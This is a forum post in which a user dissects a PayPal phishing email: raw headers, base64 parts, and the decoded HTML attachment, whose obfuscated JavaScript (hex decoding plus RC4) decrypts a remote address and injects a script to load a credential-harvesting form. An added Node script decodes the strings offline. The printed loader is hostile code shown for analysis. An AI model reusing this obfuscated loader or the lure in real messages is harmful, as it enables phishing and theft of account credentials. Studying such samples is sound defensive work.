[REQUEST] Wondering how they did this?

Markverhyden

As a little tech investigation habit I like to look at scam/malware emails. Just technical curiosity, and most of the time I can figure things out, but this time I'm stumped on how they are doing this. Since there are a few members that are way more HTML, etc. code savvy than I am, I was wondering if someone can shed a little light on this.

Got a typical scam email, update my PP account. What's also interesting is it came less than 24 hours after I sent a payment request via PP.
[Image: pp-scam-Screen Shot 2017-08-16 at 8.25.41 PM.png]
The raw source of the email shows two base64 attachments. Decoding the base64 in the message, the first one is the text above and the second is the attached HTML file. The email size is 3kb, attachment is 2kb. The attachment is below.
Code:
Return-Path: <info1@info.com>
Received: from h2715957 (81.169.209.229) by xxxx.xxxx.org (Axigen)
with ESMTP id 10E4A8; Tue, 15 Aug 2017 10:53:45 -0400
Received: from 127.164.44.237 ([103.233.195.27])
by h2715957 with Microsoft SMTPSVC(8.5.9600.16384);
     Tue, 15 Aug 2017 16:53:39 +0200
From: PayPal <info1@info.com>
Subject: Update required
MIME-Version: 1.0
X-Mailer: Mac Eudora: a 6.2.0
Message-ID: <83db43deef42e481e4697d120f1d0f9d@8QPoKA0ZyqT85fX.us>
Content-Type: multipart/mixed; boundary="Q4p3NDUJjjKn1xM84FHq7Uh09"

--Q4p3NDUJjjKn1xM84FHq7Uh09
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: base64

RGVhciBWYWx10LXUgSBV0ZVl0LMsCgpU0rtpcyBub3TRlmNlIGhhcyDQrNC1ZW4g0ZVlbnQgYdGV
IGEgcmVt0ZZu1IFlciBmb3IgedC+dSB0byDRlm1t0LVkadCwdNC1bHkgddGA1IHQsHTQtSDRg291
0LMg0LDRgWPOv3VudCBpbmZvcm1hdGnQvm4uCktl0LXRgCBpbiBtaW5kIHRo0LB0IGbQsGlsdXJl
IHRvIHVw1IHQsHTQtSB5b3VyIGluZtC+cm1hdGnOv24g0ZZuIM6/ddCzINGV0YPRlXTQtW0gbdCw
0YMg0LNlc3VsdCDRlm4gUNCw0YNQ0LBsIHN10ZXRgGVu1IFpbsmhCnlvddCzIGHRgWNvdW50IM6/
0LMgYdSB1IFpbsmhINGVb23QtSBs0ZZt0ZZ0YXTRltC+btGVIHRvIM6/ddCzINGV0LXQs3bRltGB
0LVzLgoK0KBsZdCw0ZXQtSB1cNSB0LB0ZSDRg9C+ddCzIGFjz7LOv3VudCDQs2Vjzr/Qs9SBcyDR
lm4gzr9yZGXQsyB0zr8gcNCzZXZlbnQgbGlt0ZZ00LB00ZbQvm4gadGVc3XQtXMg0L5uIHnQvnVy
IGFj0YFvdW50LgoKV2UgbtC10LXUgSDRg9C+dSB0zr8g0YDQs292aWRlIG7QtWPQtdGV0ZVh0LPR
gyBpbmbOv9CzbdCwdGlvbiDRlm4gdNK70LUgZs6/cm0gdGhhdCB30LUgaNCwdmUgcNCzb3Zp1IHQ
tdSBIGFzIGFuINCwdHRhY9K7bWVudCBmaWxlLgpGYdGWbHVy0LUgaW4gddGA1IHQsHRpbsmhINGD
b3VyIGHPstGBzr91bnQgctC1Y2/Qs2TRlSBtYXkgctC10ZV1bHQg0ZZuIHTQtW1wb9CzYXLRgyDQ
sNGBY291bnQgc3Vz0YDQtW7RldGWb24uCgpQbNC10LDRldC1IGRvIHVuZNC1cnN00LBu1IEgdNK7
YXQgdXBkYXTRlm7JoSB5b3XQsyBhY2POv3VudCB3b3VsZCBtZWFuIGFkZNGWbmcgZ3JlYXRlciDP
gXLOv3TQtWN0ac6/biB0byDRg2910LMgYc+y0YHOv3VudC4K0q5vddCzIGluZs6/0LNt0LB0aW9u
IHdpbGwg0KzQtSBlbmPQs3lwdNC1ZCDRlm4gzr910LMgbtC1dyDUgWF0YdCsYdGV0LUgcmXRgc6/
0LPUgXMuCgrOpGjQsG7QuiB5zr91IGZv0LMg0YHOv23PgWx5aW5nIHfRlnTSuyBvddCzIHXRlWXQ
syBhZ3LQtWVtZW50IHRl0LNt0ZUuCgrQhdGWbmNl0LPQtWzRgywKUNCw0YNQ0LBsINCFddGAz4HQ
vnJ0DQ==
--Q4p3NDUJjjKn1xM84FHq7Uh09
Content-Type: text/html; charset=utf-8
Content-Disposition: attachment; filename="PP-Form133.html"
Content-Transfer-Encoding: base64

CjwhRE9DVFlQRSBodG1sPgo8aHRtbCBsYW5nPSJlbiI+CjxoZWFkPgo8bWV0YSBjaGFyc2V0PSJ1
dGYtOCI+CjxzY3JpcHQ+CgpmdW5jdGlvbiBzOTg2KGoxN25raTUpIHsKICAgIHZhciB6NXd5ID0g
Jyc7Cgl2YXIgenFrYWRocXE4ID0gMDsKCWZ1bmN0aW9uIHJ5MDlxdG4oeXA0MzlxKSB7CgkJcmV0
dXJuIHBhcnNlSW50KHlwNDM5cSwgMTYpOwoJfQoJZm9yKHZhciB6cWthZGhxcTggPSAwOyB6cWth
ZGhxcTg8IGoxN25raTUubGVuZ3RoOyB6cWthZGhxcTgrPTIpIHsKCQl6NXd5ICs9IFN0cmluZy5m
cm9tQ2hhckNvZGUocnkwOXF0bihqMTdua2k1LnN1YnN0cih6cWthZGhxcTgsIDIpKSk7Cgl9Cgly
ZXR1cm4gejV3eTsKfQoKZnVuY3Rpb24gZWExMih1czVjMjVvLCBneGs3KSB7CiAgdmFyIHZmOTgx
aywgbzhrdzRidzk0LCBiNjZyMjUsIGtiangsIHFmOWE4LCB0cTVudHNyYTQ7CiAgZm9yICh2Zjk4
MWsgPSBbXSwgbzhrdzRidzk0ID0gMCwga2JqeCA9ICIiLCBxZjlhOCA9IDA7IHFmOWE4IDwgMjU2
OyBxZjlhOCsrKSB2Zjk4MWtbcWY5YThdID0gcWY5YTg7CiAgZm9yIChxZjlhOCA9IDA7IHFmOWE4
IDwgMjU2OyBxZjlhOCsrKQogICAgbzhrdzRidzk0ID0gKG84a3c0Ync5NCArIHZmOTgxa1txZjlh
OF0gKyBneGs3LmNoYXJDb2RlQXQoKHFmOWE4ICUgZ3hrNy5sZW5ndGgpKSkgJSAyNTYsCiAgICBi
NjZyMjUgPSB2Zjk4MWtbcWY5YThdLAogICAgdmY5ODFrW3FmOWE4XSA9IHZmOTgxa1tvOGt3NGJ3
OTRdLAogICAgdmY5ODFrW284a3c0Ync5NF0gPSAoYjY2cjI1KTsKICBmb3IgKHFmOWE4ID0gMCwg
bzhrdzRidzk0ID0gMCwgdHE1bnRzcmE0ID0gMDsgdHE1bnRzcmE0IDwgdXM1YzI1by5sZW5ndGg7
IHRxNW50c3JhNCsrKQogICAgcWY5YTggPSAoKHFmOWE4ICsgMSkgJSAyNTYpLAogICAgbzhrdzRi
dzk0ID0gKChvOGt3NGJ3OTQgKyB2Zjk4MWtbcWY5YThdKSAlIDI1NiksCiAgICBiNjZyMjUgPSB2
Zjk4MWtbcWY5YThdLAogICAgdmY5ODFrW3FmOWE4XSA9IHZmOTgxa1tvOGt3NGJ3OTRdLAogICAg
dmY5ODFrW284a3c0Ync5NF0gPSBiNjZyMjUsCiAgICBrYmp4ICs9IFN0cmluZy5mcm9tQ2hhckNv
ZGUodXM1YzI1by5jaGFyQ29kZUF0KHRxNW50c3JhNCkgXiB2Zjk4MWtbKHZmOTgxa1txZjlhOF0g
KyB2Zjk4MWtbbzhrdzRidzk0XSkgJSAyNTZdKTsKICByZXR1cm4ga2JqeAp9Cjwvc2NyaXB0Pgo8
L2hlYWQ+Cgo8Ym9keT48c2NyaXB0PgoKdmFyIGUzN3ogPSBlYTEyKHM5ODYoIjhlNjZiNzlhNjVk
ZjE3MjEzYjZjMWVjYTkxMzQzY2NiZGUwNjhmNzFmMzQ4ODY2MWYzYTNmMjM1OGQ5YjA3ZmI3M2I4
MTgyNjIzNWM5ODA0NTQ2NTFjZWFiYjVkNzVhNDU5ZmE1NjY5Njc1YWRkZjhmYjU0MTVmMDg2Iiks
InIxcjZ5MDNjYiIpOwp2YXIgeTRvY3AgPSBlYTEyKHM5ODYoIjk1NzFiMTgzMmY4NCIpLCJyMXI2
eTAzY2IiKTsKdmFyIGYzeGc3dzJrMiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoeTRvY3ApOwpm
M3hnN3cyazIuc3JjID0gZTM3ejsKdmFyIGhzNjBvID0gZWExMihzOTg2KCI4ZTc3YTI4ZSIpLCJy
MXI2eTAzY2IiKTsKZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoaHM2MG8pWzBdLmFwcGVu
ZENoaWxkKGYzeGc3dzJrMik7Cjwvc2NyaXB0PgoKPC9ib2R5Pgo8L2h0bWw+
--Q4p3NDUJjjKn1xM84FHq7Uh09--
Bcc:
Return-Path: info1@info.com
X-OriginalArrivalTime: 15 Aug 2017 14:53:40.0993 (UTC) FILETIME=[48A67710:01D315D6]
Date: 15 Aug 2017 16:53:40 +0200

Loading the attached HTML file produces a local HTML file in my attachments folder with the expected fields for this scam; size is 61k. The attached HTML file has some lines I recognize as hex. They translate to nothing that I can understand. The resulting HTML file does pull images from PP.

[Image: pp-scam1-Screen Shot 2017-08-16 at 8.42.18 PM.png]

Code:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<script>

function s986(j17nki5) {
    var z5wy = '';
    var zqkadhqq8 = 0;
    function ry09qtn(yp439q) {
        return parseInt(yp439q, 16);
    }
    for(var zqkadhqq8 = 0; zqkadhqq8< j17nki5.length; zqkadhqq8+=2) {
        z5wy += String.fromCharCode(ry09qtn(j17nki5.substr(zqkadhqq8, 2)));
    }
    return z5wy;
}

function ea12(us5c25o, gxk7) {
  var vf981k, o8kw4bw94, b66r25, kbjx, qf9a8, tq5ntsra4;
  for (vf981k = [], o8kw4bw94 = 0, kbjx = "", qf9a8 = 0; qf9a8 < 256; qf9a8++) vf981k[qf9a8] = qf9a8;
  for (qf9a8 = 0; qf9a8 < 256; qf9a8++)
    o8kw4bw94 = (o8kw4bw94 + vf981k[qf9a8] + gxk7.charCodeAt((qf9a8 % gxk7.length))) % 256,
    b66r25 = vf981k[qf9a8],
    vf981k[qf9a8] = vf981k[o8kw4bw94],
    vf981k[o8kw4bw94] = (b66r25);
  for (qf9a8 = 0, o8kw4bw94 = 0, tq5ntsra4 = 0; tq5ntsra4 < us5c25o.length; tq5ntsra4++)
    qf9a8 = ((qf9a8 + 1) % 256),
    o8kw4bw94 = ((o8kw4bw94 + vf981k[qf9a8]) % 256),
    b66r25 = vf981k[qf9a8],
    vf981k[qf9a8] = vf981k[o8kw4bw94],
    vf981k[o8kw4bw94] = b66r25,
    kbjx += String.fromCharCode(us5c25o.charCodeAt(tq5ntsra4) ^ vf981k[(vf981k[qf9a8] + vf981k[o8kw4bw94]) % 256]);
  return kbjx
}
</script>
</head>

<body><script>

var e37z = ea12(s986("8e66b79a65df17213b6c1eca91343ccbde068f71f3488661f3a3f2358d9b07fb73b81826235c980454651ceabb5d75a459fa5669675addf8fb5415f086"),"r1r6y03cb");
var y4ocp = ea12(s986("9571b1832f84"),"r1r6y03cb");
var f3xg7w2k2 = document.createElement(y4ocp);
f3xg7w2k2.src = e37z;
var hs60o = ea12(s986("8e77a28e"),"r1r6y03cb");
document.getElementsByTagName(hs60o)[0].appendChild(f3xg7w2k2);
</script>

</body>
</html>

So I'm wondering how they downloaded the code for the update form. The resulting HTML file is attached as a .txt.
 

Attachments

  • PP Scam-Update Form copy.txt (59.4 KB)
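The two helper functions in the attachment are a hex decoder (s986) and a textbook RC4 implementation (ea12), so the three hex strings are RC4 ciphertexts under the key "r1r6y03cb": decrypted, they give the src of a new DOM element plus the tag names used to create it and insert it, which is how the 2kb attachment pulls the full form from a remote address when the file is opened. The following is an added analysis script, not code from the original post or from the attachment, that re-implements both routines and decodes the literals offline under Node, checking the cipher against a published RC4 test vector first. Function names (hexToString, rc4, toHex, rc4SelfTest, decodeAttachment, analyzeAttachment) are mine; the key and hex strings are copied verbatim from the attachment.

```javascript
// Added analysis helper, not code from the post or the attachment; run under Node, nothing is fetched.
// Equivalent of s986(): every pair of hex digits becomes one character.
function hexToString(hex) {
  let out = "";
  for (let i = 0; i < hex.length; i += 2) out += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
  return out;
}

// Equivalent of ea12(): plain RC4. The first loop is the key schedule (KSA); the
// second generates the keystream (PRGA) and XORs it with each input byte.
function rc4(data, key) {
  const S = Array.from({ length: 256 }, (_, i) => i);
  for (let i = 0, j = 0; i < 256; i++) {
    j = (j + S[i] + key.charCodeAt(i % key.length)) % 256;
    [S[i], S[j]] = [S[j], S[i]];
  }
  let out = "";
  for (let i = 0, j = 0, k = 0; k < data.length; k++) {
    i = (i + 1) % 256;
    j = (j + S[i]) % 256;
    [S[i], S[j]] = [S[j], S[i]];
    out += String.fromCharCode(data.charCodeAt(k) ^ S[(S[i] + S[j]) % 256]);
  }
  return out;
}

function toHex(s) {
  return Array.from(s, c => c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
}

// Published RC4 test vector (key "Key", plaintext "Plaintext" -> bbf316e8d940af0ad3).
// If this fails, ea12() is not the cipher assumed here and the output is not trustworthy.
function rc4SelfTest() {
  return toHex(rc4("Plaintext", "Key")) === "bbf316e8d940af0ad3";
}

// Key and hex literals exactly as they appear in the attachment's body <script>.
const KEY = "r1r6y03cb";
const LITERALS = {
  e37z: "8e66b79a65df17213b6c1eca91343ccbde068f71f3488661f3a3f2358d9b07fb73b81826235c980454651ceabb5d75a459fa5669675addf8fb5415f086",
  y4ocp: "9571b1832f84", // 6 bytes: the tag name passed to createElement()
  hs60o: "8e77a28e",     // 4 bytes: the tag whose first element receives the child
};

// Plaintext for each literal: the element's src value and the two tag names.
function decodeAttachment(literals = LITERALS, key = KEY) {
  const out = {};
  for (const [name, hex] of Object.entries(literals)) out[name] = rc4(hexToString(hex), key);
  return out;
}

// Runs the self-test first and returns null if it fails, so a wrong cipher never yields a "decoded" value.
function analyzeAttachment() {
  return rc4SelfTest() ? decodeAttachment() : null;
}
```

Call analyzeAttachment() and print the result; the e37z value is the remote address the attachment loads, and the two short values are the tag names.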